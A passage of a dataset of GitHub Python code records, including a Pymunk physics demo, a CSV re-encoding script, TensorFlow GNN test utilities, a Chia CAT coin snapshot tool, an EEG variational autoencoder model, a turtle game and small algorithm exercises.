val is not None:\n counters[k] = val\n\n assert_that(context.qs.attach_counters(), has_properties(counters))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/pytest_bdd/steps/attach_counters.py","file_name":"attach_counters.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37295800119","text":"import time\n\nimport pymunk\nfrom pymunk.pyglet_util import DrawOptions\n\nimport pyglet\n\nfrom engine.body import Group, Body, Circle, Segment\n\nwindow = pyglet.window.Window(900, 600, \"Pymunk Tester\", resizable=False)\noptions = DrawOptions()\n\nspace = pymunk.Space()\nspace.gravity = 0, -1000\n\ncircles = Group()\ncircles.add_all([\n Circle(450, 500, 30, 2),\n Circle(452, 400, 30)\n])\ncircles.set_attribute(\"elasticity\", 0.98)\ncircles.set_attribute(\"friction\", 1.0)\ncircles.add_to_space(space)\n\npj = pymunk.PinJoint(*[c.body for c in circles.children])\nspace.add(pj)\n\nsegments = Group()\nsegments.add_all([\n Segment((50, 50), (850, 50), 2, body_type=Body.STATIC),\n Segment((50, 550), (50, 50), 2, body_type=Body.STATIC),\n Segment((50, 550), (850, 550), 2, body_type=Body.STATIC),\n Segment((850, 550), (850, 50), 2, body_type=Body.STATIC)\n])\nsegments.set_attribute(\"elasticity\", 0.98)\nsegments.set_attribute(\"friction\", 
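`random.random() < split` in the redistribution script above only yields the target test fraction in expectation, so small classes can end up over- or under-sampled. If an exact per-class split is wanted, `random.sample` moves precisely int(n * split) files; a sketch using the sample's own `wdt`/`wdv` directory naming:

import os
import random

def exact_split(wdt, wdv, split=0.1):
    files = os.listdir(wdt)
    for name in random.sample(files, int(len(files) * split)):
        os.replace(os.path.join(wdt, name), os.path.join(wdv, name))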
1.0)\nsegments.add_to_space(space)\n\n@window.event\ndef on_draw():\n window.clear()\n space.debug_draw(options)\n\ndef update(dt):\n space.step(dt)\n\nif __name__ == \"__main__\":\n pyglet.clock.schedule_interval(update, 1.0 / 60.0)\n pyglet.app.run()","repo_name":"henrymwestfall/Pyglet-Pymunk-Test","sub_path":"pymunk-practice.py","file_name":"pymunk-practice.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"75023603751","text":"import sys\nimport os\nimport codecs\n\nfrom_encoding = 'iso-8859-2'\nto_encoding = 'utf-8'\n\nif len(sys.argv) < 2:\n print('Nincs megadva fájlnév.')\n sys.exit(1)\n\ncsv_file = sys.argv[1]\ntarget_filename = f'utf8_{csv_file}'\nif not os.path.exists(target_filename):\n print(f'Converting {csv_file}')\n with codecs.open(csv_file, 'r', from_encoding) as source_file:\n with codecs.open(target_filename, 'w', to_encoding) as target_file:\n for line in source_file:\n converted_line = line.encode(to_encoding).decode(to_encoding)\n target_file.write(converted_line)\n print('Ready. Bye.')\nelse:\n print(f'{target_filename} is already there, not re-encoding it.')\n","repo_name":"Code-for-Hungary/agrartamdataloader","sub_path":"convert_encoding.py","file_name":"convert_encoding.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10138458672","text":"\"\"\"Set of utility functions for GraphTensor tests.\"\"\"\n\nfrom typing import Mapping, Text\n\nfrom absl.testing import parameterized\nimport tensorflow as tf\nfrom tensorflow_gnn.graph import graph_constants as const\nfrom tensorflow_gnn.graph import graph_tensor_encode as ge\nfrom tensorflow_gnn.graph import graph_tensor_random as gr\nfrom tensorflow_gnn.graph import schema_utils as su\nfrom tensorflow_gnn.proto import graph_schema_pb2 as schema_pb2\n\n\nclass GraphTensorTestBase(tf.test.TestCase, parameterized.TestCase):\n \"\"\"Base class for GraphTensor tests.\"\"\"\n\n def assertFieldsEqual(self, actual: const.Fields, expected: const.Fields):\n self.assertIsInstance(actual, Mapping)\n self.assertAllEqual(actual.keys(), expected.keys())\n for key in actual.keys():\n self.assertAllEqual(actual[key], expected[key], msg=f'feature={key}')\n\n\ndef generate_random_data_files(schema: schema_pb2.GraphSchema,\n filebase: Text,\n num_shards: int,\n num_examples: int):\n \"\"\"Write some random data to a file.\n\n Args:\n schema: A GraphSchema instance.\n filebase: A string, base filename.\n num_shards: The number of shards to generate.\n num_examples: The number of examples to produce.\n \"\"\"\n filenames = ['{}-{:05d}-of-{:05d}'.format(filebase, shard, num_shards)\n for shard in range(num_shards)]\n num_base_examples = num_examples // len(filenames)\n remainder = num_examples - num_base_examples * len(filenames)\n\n spec = su.create_graph_spec_from_schema_pb(schema)\n for findex, filename in enumerate(filenames):\n with tf.io.TFRecordWriter(filename) as file_writer:\n num_shard_examples = num_base_examples + (1 if findex < remainder else 0)\n for _ in range(num_shard_examples):\n graph = gr.random_graph_tensor(spec)\n example = ge.write_example(graph)\n 
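The `engine.body` wrappers in the Pymunk tester above are project-local. For reference, one of its circles expressed in plain pymunk calls, which is roughly what Group/Circle must be wrapping:

import pymunk

space = pymunk.Space()
space.gravity = (0, -1000)

body = pymunk.Body(mass=2, moment=pymunk.moment_for_circle(2, 0, 30))
body.position = (450, 500)
shape = pymunk.Circle(body, 30)
shape.elasticity = 0.98
shape.friction = 1.0
space.add(body, shape)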
file_writer.write(example.SerializeToString())\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"gnn-main/tensorflow_gnn/graph/graph_tensor_test_utils.py","file_name":"graph_tensor_test_utils.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"71525035433","text":"#!/bin/python\n\nimport random\n\nclass Bandits:\n def __init__(self, num):\n self.u = [random.random() for i in xrange(num)]\n def getReward(self, a):\n if a < 0 or a > len(self.u):\n raise Exception(\"Invalid a %d\"%(a))\n\n r = random.random()\n if r <= self.u[a]:\n return 1;\n else:\n return 0;\n \n \n\n","repo_name":"algorithmdog/Reinforcement_Learning_Blog","sub_path":"MultiArmedBandits/multi_armed_bandits.py","file_name":"multi_armed_bandits.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"72"} +{"seq_id":"11816563973","text":"import logging\nfrom typing import Dict, List, Optional\nfrom chia.types.blockchain_format.coin import Coin\nfrom chia.types.blockchain_format.program import Program\nfrom chia.types.blockchain_format.sized_bytes import bytes32\nfrom chia.types.coin_spend import CoinSpend\nfrom chia.types.condition_opcodes import ConditionOpcode\nfrom chia.types.condition_with_args import ConditionWithArgs\nfrom chia.util.ints import uint64\nfrom chia.util.hash import std_hash\nfrom chia.wallet.cat_wallet.cat_utils import construct_cat_puzzle\nfrom clvm.casts import int_from_bytes, int_to_bytes\nfrom src.coin_spend_record import CoinSpendRecord\nfrom src.coin_create_record import CoinCreateRecord\nfrom src.cat_utils import create_coin_conditions_for_inner_puzzle, extract_cat1\nfrom src.config import Config\nfrom src.database import connection, get_initial_id, get_next_coin_spends, persist_coin_create, persist_coin_spend\nfrom src.full_node import FullNode\nfrom src.puzzles.cat_loader import CAT1_MOD\n\n\ndef created_outputs_for_conditions_dict(\n conditions_dict: Dict[ConditionOpcode, List[ConditionWithArgs]],\n input_coin_name: bytes32,\n) -> List[Coin]:\n output_coins = []\n for cvp in conditions_dict.get(ConditionOpcode.CREATE_COIN, []):\n puzzle_hash, amount_bin = cvp.vars[0], cvp.vars[1]\n amount = int_from_bytes(amount_bin)\n # ignore magic conditions\n if amount > 0:\n coin = Coin(input_coin_name, bytes32(puzzle_hash), uint64(amount))\n output_coins.append(coin)\n return output_coins\n\n\nclass CatSnapshot:\n log = logging.getLogger('CatSnapshot')\n full_node: FullNode\n\n def __init__(self, full_node: FullNode):\n self.full_node = full_node\n\n @staticmethod\n async def create():\n full_node = await FullNode.create()\n\n return CatSnapshot(full_node)\n\n async def generate(self):\n # Collect CAT coin spends\n height = Config.start_height\n while True:\n if height > Config.target_height:\n break\n\n await self.__process_block(height)\n\n height = height + 1\n # Extract coin create conditions from coin spends\n id = get_initial_id(Config.start_height)\n if id is None:\n self.log.warn(\"No new coin spends were discovered by this scan\")\n\n connection.close()\n self.full_node.close()\n\n return None\n while True:\n coin_spends = get_next_coin_spends(id, 100)\n\n if len(coin_spends) == 0:\n break\n\n for (\n id,\n coin_name,\n inner_puzzle,\n outer_puzzle,\n inner_solution,\n outer_solution,\n amount,\n tail_hash,\n spent_height\n ) in coin_spends:\n self.log.info(\n \"coin_name %s amount %i tail_hash %s 
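The multi-armed bandit sample above is Python 2 (`xrange`), and its bounds check has an off-by-one: `a > len(self.u)` still admits `a == len(self.u)`. A Python 3 port with the check fixed:

import random

class Bandits:
    def __init__(self, num):
        self.u = [random.random() for _ in range(num)]

    def get_reward(self, a):
        if not 0 <= a < len(self.u):
            raise ValueError(f"invalid arm {a}")
        return 1 if random.random() <= self.u[a] else 0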
spent_height %s\",\n coin_name,\n amount,\n tail_hash,\n spent_height\n )\n inner_puzzle = Program.fromhex(inner_puzzle)\n outer_puzzle = Program.fromhex(outer_puzzle)\n inner_solution = Program.fromhex(inner_solution)\n outer_solution = Program.fromhex(outer_solution)\n\n inner_puzzle_create_coin_conditions = create_coin_conditions_for_inner_puzzle(\n bytes32.fromhex(coin_name),\n inner_puzzle,\n inner_solution\n )\n\n cursor = connection.cursor()\n\n for coin in inner_puzzle_create_coin_conditions:\n outer_puzzle_hash = construct_cat_puzzle(\n CAT1_MOD,\n bytes32.fromhex(tail_hash),\n coin.puzzle_hash\n ).get_tree_hash(coin.puzzle_hash)\n\n created_coin_name = std_hash(\n bytes32.fromhex(coin_name) + outer_puzzle_hash + int_to_bytes(coin.amount)\n ).hex()\n\n coin_create_record = CoinCreateRecord(\n coin_name=created_coin_name,\n inner_puzzle_hash=coin.puzzle_hash.hex(),\n outer_puzzle_hash=outer_puzzle_hash.hex(),\n amount=coin.amount,\n tail_hash=tail_hash,\n created_height=spent_height\n ) \n\n persist_coin_create(cursor, coin_create_record)\n\n self.log.info(\n \"Persisted CAT coin created with name %s, TAIL %s, height %i\",\n created_coin_name,\n tail_hash,\n spent_height\n )\n\n connection.commit()\n cursor.close()\n\n id = id + 1\n \n self.full_node.close()\n\n async def __process_block(self, height: int):\n block_record = await self.full_node.get_block_record_by_height(height)\n\n self.log.debug(\"Got block record %s at height: %i\", block_record.header_hash, height)\n\n if block_record.timestamp is not None:\n self.log.debug(\"Processing transaction block %s\", block_record.header_hash)\n\n coin_spends = await self.full_node.get_block_spends(block_record.header_hash)\n\n if coin_spends is not None:\n self.log.info(\"%i spends found in block\", len(coin_spends))\n self.__process_coin_spends(height, block_record.header_hash, coin_spends)\n else:\n self.log.info(\"None at %i\", height)\n else:\n self.log.info(\"Skipping non-transaction block at height %i\", height)\n\n def __process_coin_spends(self, height, header_hash: str, coin_spends: Optional[List[CoinSpend]]):\n if coin_spends is None or len(coin_spends) == 0:\n return None\n\n self.log.info(\"Processing %i coin spends for block %s at height %i\", len(coin_spends), header_hash, height)\n\n cursor = connection.cursor()\n\n for coin_spend in coin_spends:\n result = extract_cat1(coin_spend)\n\n if result is None:\n self.log.debug(\"Found non-CAT coin spend\")\n else:\n outer_puzzle = coin_spend.puzzle_reveal.to_program()\n outer_solution = coin_spend.solution.to_program()\n inner_solution = outer_solution.first()\n (\n tail_hash,\n outer_puzzle,\n _,\n inner_puzzle,\n _\n ) = result\n\n spent_coin_record = CoinSpendRecord(\n coin_name=coin_spend.coin.name().hex(),\n inner_puzzle=inner_puzzle.__str__(),\n outer_puzzle=outer_puzzle.__str__(),\n inner_solution=inner_solution.__str__(),\n outer_solution=outer_solution.__str__(),\n amount=coin_spend.coin.amount,\n tail_hash=tail_hash.as_python().hex(),\n spent_height=height\n )\n\n persist_coin_spend(cursor, spent_coin_record)\n\n connection.commit()\n cursor.close()\n","repo_name":"Chia-Network/CAT-addresses","sub_path":"src/cat_snapshot.py","file_name":"cat_snapshot.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13654202585","text":"import tensorflow as tf\nimport numpy as np\nimport model_2d\nimport sys\n\n\nnchannel = 19\n\ndef convolutional_encoder(x, n_hidden, n_output, 
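The `std_hash(...)` call in the CAT snapshot above is the standard Chia coin-id derivation: sha256 over parent coin id, puzzle hash, and amount. A stdlib sketch; the amount encoding here is a simplified signed big-endian form, an assumption about what the clvm `int_to_bytes` helper produces for positive amounts:

from hashlib import sha256

def coin_name(parent_id: bytes, puzzle_hash: bytes, amount: int) -> bytes:
    # simplified: clvm uses a minimal signed big-endian integer encoding
    amount_bytes = amount.to_bytes((amount.bit_length() + 8) // 8, "big")
    return sha256(parent_id + puzzle_hash + amount_bytes).digest()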
keep_prob):\n\n pool_size = 2\n\n with tf.variable_scope('conv_enc'):\n x = tf.reshape(x, [-1, x.get_shape()[-1], 1])\n conv1 = tf.layers.conv1d(x, filters=n_hidden, activation=tf.nn.elu, kernel_size=4, dilation_rate=2)\n drop = tf.nn.dropout(conv1, keep_prob)\n mp1 = tf.layers.max_pooling1d(drop, pool_size=pool_size, strides=pool_size)\n conv2 = tf.layers.conv1d(mp1, filters=n_hidden, activation=tf.nn.elu, kernel_size=2, dilation_rate=2)\n drop = tf.nn.dropout(conv2, keep_prob)\n mp2 = tf.layers.flatten(tf.layers.max_pooling1d(drop, pool_size=pool_size, strides=pool_size))\n\n # output layer\n # borrowed from https: // github.com / altosaar / vae / blob / master / model.py\n wo = tf.get_variable('wo', [mp2.get_shape()[1], n_output * 2],\n initializer=tf.contrib.layers.variance_scaling_initializer())\n bo = tf.get_variable('bo', [n_output * 2], initializer=tf.constant_initializer(0.))\n gaussian_params = tf.matmul(mp2, wo) + bo\n\n # The mean parameter is unconstrained\n mean = gaussian_params[:, :n_output]\n # The standard deviation must be positive. Parametrize with a softplus and\n # add a small epsilon for numerical stability\n stddev = tf.nn.softplus(gaussian_params[:, n_output:] + 1e-8)\n\n return mean, stddev\n\ndef conv_upsample_block(input, n_hidden, keep_prob):\n conv = tf.layers.conv1d(input, filters=n_hidden, activation=tf.nn.elu, kernel_size=3, padding='same')\n drop = tf.nn.dropout(conv, keep_prob)\n drop = tf.reshape(drop, [-1, 1, drop.get_shape()[1], n_hidden])\n # Use resize images to upsample\n us = tf.image.resize_images(drop, size=[1, drop.get_shape()[2] * 2])\n us = tf.reshape(us, [-1, us.get_shape()[2], n_hidden])\n return us\n\n#def conv1d_upsample_block(input, n_hidden, n_output, keep_prob):\n #conv = tf.contrib.nn.conv1d_transpose(input, filter=n_hidden, stride=2, kernel_size=2, padding='same')\n #return conv\n\ndef full_rf_block(input, n_hidden, n_output, keep_prob):\n\n conv = tf.layers.conv1d(input, filters=n_hidden, activation=tf.nn.elu, kernel_size=8, padding='same')\n conv = tf.layers.conv1d(conv, filters=n_hidden, activation=tf.nn.elu, kernel_size=8, padding='same')\n conv = tf.layers.conv1d(conv, filters=n_hidden, activation=tf.nn.elu, kernel_size=8, padding='same')\n\n\ndef conv1d_shuffle_upsample_block(input, n_hidden, n_output, keep_prob, upsample_amount=2, loop_num=0):\n conv = tf.layers.conv1d(input, filters=n_hidden, activation=tf.nn.elu, kernel_size=2**(loop_num+1), padding='same')\n conv = tf.layers.conv1d(conv, filters=n_hidden, activation=tf.nn.elu, kernel_size=2**(loop_num+1), padding='same')\n conv = tf.layers.conv1d(conv, filters=n_hidden, activation=tf.nn.elu, kernel_size=2**(loop_num+1), padding='same')\n\n # batch x size x n_filters/2\n out = tf.reshape(conv, [-1, conv.get_shape()[1].value * upsample_amount,\n tf.cast(n_hidden / upsample_amount, tf.int32)])\n return out\n\ndef conv1d_shuffle_decoder(input, n_hidden, n_output, keep_prob):\n # start with 64\n n_latent = 64\n shuf = tf.layers.dense(input, n_latent)\n\n\n upsample_factor=2\n\n x = tf.reshape(shuf, [-1, input.get_shape()[1].value, 1])\n # get number of doubling layers required\n import math\n num_layers = np.ceil(math.log(n_output / n_latent, upsample_factor)).astype(int)\n # need to upscale by 38\n # 2x2x2x2x2x2\n for i in range(num_layers):\n x = conv1d_shuffle_upsample_block(x, n_hidden, n_output, keep_prob, upsample_amount=upsample_factor, loop_num=i)\n\n # now 64x64 -> trim from edges to arrive at n_output\n #x = tf.layers.conv1d(x, filters=1, kernel_size=1)\n x = 
tf.layers.flatten(tf.layers.conv1d(x, filters=1, kernel_size=1))\n start = tf.cast((x.get_shape()[1].value - n_output) / 2, tf.int32)\n return x[:, start:start+n_output]\n\ndef convolutional_decoder(x, n_hidden, n_output, keep_prob):\n with tf.variable_scope('conv_dec'):\n\n # Linear layer\n #x = tf.layers.dense(x, n_output / 8, activation=tf.nn.elu)\n x = tf.reshape(x, [-1, 64, 1])\n\n act1 = conv_upsample_block(x, n_hidden * 2, keep_prob)\n #act2 = conv_upsample_block(act1, n_hidden * 2, keep_prob)\n #act3 = conv_upsample_block(act2, n_hidden, keep_prob)\n\n # Final convolution for output\n conv3 = tf.layers.conv1d(act1, filters=1, activation=tf.nn.sigmoid, kernel_size=1)\n output = tf.layers.flatten(conv3)\n\n return output\n\n# Gaussian MLP as encoder\ndef gaussian_MLP_encoder(x, n_hidden, n_output, keep_prob):\n with tf.variable_scope(\"gaussian_MLP_encoder\"):\n # initializers\n w_init = tf.contrib.layers.variance_scaling_initializer()\n b_init = tf.constant_initializer(0.)\n\n # 1st hidden layer\n\n #embeddings = tf.get_variable(\"embeddings\", [256, 16])\n #embedded = tf.nn.embedding_lookup(embeddings, x)\n #embedded = tf.reshape(embedded, [-1, x.get_shape()[-1]*16])\n\n w0 = tf.Variable(w_init([x.get_shape()[1].value, n_hidden]), 'w0')\n b0 = tf.get_variable('b0', [n_hidden], initializer=b_init)\n h0 = tf.matmul(x, w0) + b0\n h0 = tf.nn.elu(h0)\n h0 = tf.nn.dropout(h0, keep_prob)\n\n # 2nd hidden layer\n w1 = tf.get_variable('w1', [h0.get_shape()[1], n_hidden], initializer=w_init)\n b1 = tf.get_variable('b1', [n_hidden], initializer=b_init)\n h1 = tf.matmul(h0, w1) + b1\n h1 = tf.nn.elu(h1)\n h1 = tf.nn.dropout(h1, keep_prob)\n\n #h2 = tf.reshape(h2, [-1, n_hidden, 256])\n #h2 = tf.reduce_sum(h2, axis=2)\n\n # output layer\n # borrowed from https: // github.com / altosaar / vae / blob / master / model.py\n wo = tf.get_variable('wo', [h1.get_shape()[1], n_output * 2], initializer=w_init)\n bo = tf.get_variable('bo', [n_output * 2], initializer=b_init)\n gaussian_params = tf.matmul(h1, wo) + bo\n\n # The mean parameter is unconstrained\n mean = gaussian_params[:, :n_output]\n # The standard deviation must be positive. Parametrize with a softplus and\n # add a small epsilon for numerical stability\n stddev = tf.nn.softplus(gaussian_params[:, n_output:] + 1e-8)\n\n return mean, stddev\n\ndef bi_rnn_encoder(x, n_hidden, n_output, keep_prob):\n with tf.variable_scope(\"bi_rnn_encoder\"):\n\n x = tf.reshape(x, [-1, nchannel, 128])\n x = tf.transpose(x, perm=[0, 2, 1])\n\n cell = tf.nn.rnn_cell.LSTMCell(n_hidden, state_is_tuple=True)\n lstmcell = tf.contrib.rnn.InputProjectionWrapper(cell, x.get_shape()[-1].value, activation=tf.nn.elu)\n outputs, states = tf.nn.bidirectional_dynamic_rnn(cell_fw=cell,\n cell_bw=cell,\n dtype=tf.float32,\n inputs=x)\n\n states = tf.reduce_sum(states, [0,1])\n states = tf.reshape(states, [-1,n_hidden])\n\n gaussian_params = tf.layers.dense(states, n_output*2)\n # The mean parameter is unconstrained\n mean = gaussian_params[:, :n_output]\n # The standard deviation must be positive. 
Parametrize with a softplus and\n # add a small epsilon for numerical stability\n stddev = tf.nn.softplus(gaussian_params[:, n_output:] + 1e-8)\n\n return mean, stddev\n\ndef bi_rnn_decoder(z, n_hidden, n_output, keep_prob):\n init_vector = tf.layers.dense(z, n_hidden)\n #init_vector = tf.reshape(tf.tile(init_vector, [1,2]), [2,-1,n_hidden])\n initial = tf.contrib.rnn.LSTMStateTuple(init_vector, init_vector)\n n_out = tf.cast(n_output / nchannel, tf.int32)\n with tf.variable_scope(\"bi_rnn_decoder\"):\n #x = tf.tile(z, [1, n_out])\n #x = tf.reshape(x, [-1, n_out, z.get_shape()[1].value])\n x = tf.zeros([128, n_out, n_hidden])\n cell = tf.nn.rnn_cell.LSTMCell(n_hidden, state_is_tuple=True, activation=tf.nn.elu)\n lstm_cell = tf.contrib.rnn.OutputProjectionWrapper(cell, nchannel)\n outputs, _ = tf.nn.bidirectional_dynamic_rnn(cell_fw=lstm_cell,\n cell_bw=lstm_cell,\n dtype=tf.float32,\n initial_state_fw=initial,\n initial_state_bw=initial,\n inputs=x)\n y = tf.reduce_sum(outputs, 0)\n y = tf.transpose(y, [0, 2, 1])\n y = tf.layers.flatten(y)\n y = tf.nn.sigmoid(y)\n return y\n\n\n# Bernoulli MLP as decoder\ndef bernoulli_MLP_decoder(z, n_hidden, n_output, keep_prob, reuse=False):\n\n with tf.variable_scope(\"bernoulli_MLP_decoder\", reuse=reuse):\n # initializers\n w_init = tf.contrib.layers.variance_scaling_initializer()\n b_init = tf.constant_initializer(0.)\n\n # 1st hidden layer\n w0 = tf.get_variable('w0', [z.get_shape()[1], n_hidden], initializer=w_init)\n b0 = tf.get_variable('b0', [n_hidden], initializer=b_init)\n h0 = tf.matmul(z, w0) + b0\n h0 = tf.nn.elu(h0)\n h0 = tf.nn.dropout(h0, keep_prob)\n\n # 2nd hidden layer\n w1 = tf.get_variable('w1', [h0.get_shape()[1], n_hidden], initializer=w_init)\n b1 = tf.get_variable('b1', [n_hidden], initializer=b_init)\n h1 = tf.matmul(h0, w1) + b1\n h1 = tf.nn.elu(h1)\n h1 = tf.nn.dropout(h1, keep_prob)\n\n # output layer-mean\n wo = tf.get_variable('wo', [h1.get_shape()[1], n_output], initializer=w_init)\n bo = tf.get_variable('bo', [n_output], initializer=b_init)\n y = tf.sigmoid(tf.matmul(h1, wo) + bo)\n #y = tf.reshape(y, [-1, n_output, 256])\n\n return y\ndef one_layer_encoder(input, n_hidden, output_size, keep_prob):\n out = tf.layers.dense(input, output_size*2, activation=tf.nn.elu)\n return out[:,:output_size], tf.nn.relu(out[:,output_size:])\n\ndef one_layer_decoder(inputs, n_hidden, output_size, keep_prob):\n return tf.layers.dense(inputs, output_size, activation=tf.nn.sigmoid)\n\ndef sample(mean, logvar):\n noise = tf.random_normal(tf.shape(mean))\n sample = mean + tf.exp(0.5 * logvar) * noise\n return sample\n\ndef iaf(sample, mean, logvar):\n return -0.5 * (np.log(2 * np.pi) + logvar + tf.square(sample - mean) / tf.exp(logvar))\n\ndef KL_iaf(mu, sigma, dim_z):\n z = sample(mu, sigma)\n\n logqs = iaf(z, mu, sigma)\n L = tf.get_variable(\"inverse_cholesky\", [dim_z, dim_z], dtype=tf.float32, initializer=tf.zeros_initializer)\n diag_one = tf.ones([dim_z], dtype=tf.float32)\n L = tf.matrix_set_diag(L, diag_one)\n mask = np.tril(np.ones([dim_z, dim_z]))\n L = L * mask\n latent_vector = tf.matmul(z, L)\n logps = iaf(latent_vector, tf.zeros_like(mu), tf.zeros_like(sigma))\n\n\n KL_divergence = logqs - logps\n\n return (z, KL_divergence)\n\ndef compute_kernel(x, y):\n x_size = tf.shape(x)[0]\n y_size = tf.shape(y)[0]\n dim = tf.shape(x)[1]\n tiled_x = tf.tile(tf.reshape(x, tf.stack([x_size, 1, dim])), tf.stack([1, y_size, 1]))\n tiled_y = tf.tile(tf.reshape(y, tf.stack([1, y_size, dim])), tf.stack([x_size, 1, 1]))\n return 
tf.exp(-tf.reduce_mean(tf.square(tiled_x - tiled_y), axis=2) / tf.cast(dim, tf.float32))\n\ndef mmd(z_enc, z_sample):\n    x_kernel = compute_kernel(z_sample, z_sample)\n    y_kernel = compute_kernel(z_enc, z_enc)\n    xy_kernel = compute_kernel(z_sample, z_enc)\n    return tf.reduce_mean(x_kernel) + tf.reduce_mean(y_kernel) - 2 * tf.reduce_mean(xy_kernel)\n\n\n# interface for encoder:\n# x_hat, n_hidden, dim_z, keep_prob\n# interface for decoder:\n# z, n_hidden, n_output, keep_prob\n\n# Gateway\ndef autoencoder(x_hat, x, dim_img, dim_z, n_hidden, keep_prob, use_iaf=False, use_mmd=True,\n                encoder='convolutional_encoder', decoder='convolutional_decoder', mse=False):\n\n\n    with tf.variable_scope('autoencoder'):\n        dim_img = x_hat.get_shape()[1].value\n\n\n        # Dynamically choose encoder and decoder\n        this_mod = sys.modules[__name__]\n        if encoder.startswith('model_2d'):\n            encoder_func = getattr(model_2d, encoder.replace('model_2d.', ''))\n        else:\n            encoder_func = getattr(this_mod, encoder.replace('model_2d.', ''))\n        if decoder.startswith('model_2d'):\n            decoder_func = getattr(model_2d, decoder.replace('model_2d.', ''))\n        else:\n            decoder_func = getattr(this_mod, decoder.replace('model_2d.', ''))\n\n        # batch normalize\n        # x_hat = tf.layers.batch_normalization(x_hat)\n\n        n_layers=5\n\n        # encoding\n        mu, sigma = encoder_func(x_hat, n_hidden, dim_z, keep_prob)\n\n        if use_iaf:\n            z, KL_divergence = KL_iaf(mu, sigma, dim_z)\n        else:\n            # sampling by re-parameterization technique\n            z = mu + sigma * tf.random_normal(tf.shape(mu), 0, 1, dtype=tf.float32)\n            if use_mmd:\n                KL_divergence = mmd(z, tf.random_normal(tf.stack([200, dim_z])))\n            else:\n                KL_divergence = 0.5 * tf.reduce_sum(tf.square(mu) + tf.square(sigma) - tf.log(tf.square(sigma)) - 1, 1)\n\n        y = decoder_func(z, n_hidden, dim_img, keep_prob=keep_prob)\n\n        # loss\n        if mse:\n            marginal_likelihood = tf.losses.mean_squared_error(x, y)\n        else:\n            marginal_likelihood = -tf.reduce_sum(x * tf.log(y) + (1 - x) * tf.log(1 - y), 1)\n        marginal_likelihood = tf.reduce_mean(marginal_likelihood)\n\n        marginal_likelihood_grad = tf.gradients(marginal_likelihood, tf.global_variables(scope='autoencoder'))[-1]\n        marginal_likelihood_norm = tf.norm(marginal_likelihood_grad, name='norm')\n\n        KL_divergence = tf.reduce_mean(KL_divergence)\n\n        loss = marginal_likelihood + KL_divergence\n\n        return y, z, loss, marginal_likelihood, KL_divergence, marginal_likelihood_norm\n\ndef decoder(z, n_hidden, dim_img, keep_prob=1.0):\n\n    y = bernoulli_MLP_decoder(z, n_hidden, dim_img, keep_prob, reuse=True)\n\n    return y\n","repo_name":"grappli/eeg-vae","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14237,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
{"seq_id":"18714506755","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\nimport random\n\n\n\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\nplayer = Player()\ncar = CarManager()\n\nscoreboard = Scoreboard()\nscreen.onkeypress(player.go_up, \"Up\")\nscreen.listen()\ngame_is_on = True\ngame_over = False\n\n\ndef start_over():\n    scoreboard.start_again()\n    player.next_level()\n    car.start_again()\n    global game_over\n    game_over = False\n\n\ndef end_game():\n    global game_is_on\n    game_is_on = False\n\n\nwhile game_is_on:\n\n    time.sleep(0.1)\n    # Create random cars\n    if random.randint(0, 5) == 1:\n        car.create_car()\n\n    if not game_over:\n        car.move()\n    else:\n        
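# game over: freeze car movement until the player answers the\n        # restart prompt below (start_over runs on \"y\", end_game on \"n\")\n        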
# Ask if they want to start again\n        screen.onkeypress(start_over, \"y\")\n        screen.onkeypress(end_game, \"n\")\n        screen.listen()\n    screen.update()\n    # When player reaches top of screen\n    if player.ycor() > 280:\n        player.next_level()\n        scoreboard.next_level()\n        car.next_level()\n    # Checking for collisions with car\n    for specific_car in car.car_list:\n        if player.distance(specific_car) < 20 or player.distance(specific_car) < 40 and player.ycor() == specific_car.ycor():\n            scoreboard.game_over()\n            game_over = True\n\n","repo_name":"DanielGresak/turtle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"33147263198","text":"# SWEA problem 1859\n\n\ndef max_num(numbers): # finds the index and value of the largest number\n    temp = [0, 0]\n    for element in range(len(numbers)):\n        if int(numbers[element]) > int(temp[1]):\n            temp[0] = element\n            temp[1] = numbers[element]\n    return temp\n\n\ndef aaa(N):\n    sale_prices = input().split()\n    while True:\n        king = max_num(sale_prices)\n        sum = 0\n        for element in range(int(king[0])):\n            sum += (int(king[1]) - int(sale_prices[element]))\n        print(sum)\n        if king[0] == (N-1):\n            break\n        else:\n            sale_prices = sale_prices[int(king[0])+1:]\n            N = N - int(king[0]) + 1\n\n\nT = int(input())\nfor tc in range(T):\n    print('#{}'.format(tc+1))\n    N = int(input())\n    aaa(N)\n\n\n    # TODO: the numbers after the largest one must also be used. Needs to be added!!!!","repo_name":"chich2/Algorithm","sub_path":"SW_Expert_Academy/millionaire_project.py","file_name":"millionaire_project.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
